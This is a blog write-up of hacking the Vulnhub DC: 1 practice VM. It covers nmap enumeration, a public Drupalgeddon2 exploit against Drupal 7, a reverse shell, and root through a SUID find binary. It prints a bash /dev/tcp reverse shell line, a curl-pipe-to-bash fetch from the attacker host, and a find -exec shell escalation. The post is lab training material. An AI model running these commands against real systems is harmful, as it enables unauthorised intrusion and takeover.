Open in app

Sign in

Write

Sign in

Hacking DC: 1 - Vulnhub

Michael Ikua
3 min readJul 16, 2019

It’s been a while since I wrote, creating this series of me hacking through the DC VMs from Vulnhub should be the perfect opportunity.

I’ll skip the discovering IP part, if you’ve read previous articles it should be pretty straightforward.

Service Enumeration

Running a fast scan on all ports to discover which ports are open.

nmap -sS -p- --min-rate=1000 192.168.56.104

Now we can deep dive and use nmap scripts to get the versions and some more information on the services running.

nmap -sC -sV -p 22,80,111,52587 -oN DC:1.tcpscan 192.168.56.104

HTTP

Drupal 7 is running on Apache based on the nmap output and we can verify that by checking on the browser.

You can also use wappalyzer plugin to get the version of Drupal running as well.

If you’ve come across Drupal before you might have heard of Drupalgeddon.

Fortunately, Drupal 7 is exploitable by Drupalgeddon 2 which exploits the RCE vulnerability. Here’s a good repo that has the PoC to verify this.

dreadlocked/Drupalgeddon2

Exploit for Drupal v7.x + v8.x (Drupalgeddon 2 / CVE-2018-7600 / SA-CORE-2018-002) - dreadlocked/Drupalgeddon2

github.com

SSH

This didn’t happen to be vulnerable.

Exploitation

Running the PoC proves the vulnerability and gives the ability for remote code execution.

Getting shell and privilege escalation

The exploit runs as a web shell which is not very ideal, so it’s better to get a reverse shell which runs bash.

I hosted a shell script on my kali with this command:

bash -i >& /dev/tcp/192.168.56.1/9001 0>&1

Then ran on the prompt given by the exploit:

curl http://192.168.56.1/shell.sh | bash

This way I got a reverse shell on nc listening on 9001.

What I like to do after I get shell is run LinEnum to find possible ways to privesc.

Looking through the output, find has it’s SUID bit set.

We can abuse that to get root privileges!

find . -exec /bin/sh \; -quit

Using this find command from gtfobins we get root and read the final flag.

Conclusion

For this VM my goal was just getting root, for future VMs I’ll try to work on some post exploitation and explore more ways to exploit and privesc. This VM is for beginner and exploiting it is straightforward.

Twitter: ikuamike

Github: ikuamike

Hacking
Vulnhub
Ctf
Writeup
Infosec

--

--

Michael Ikua

Written by Michael Ikua

81 Followers

CyberSecurity | CTFs | https://blog.ikuamike.io

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams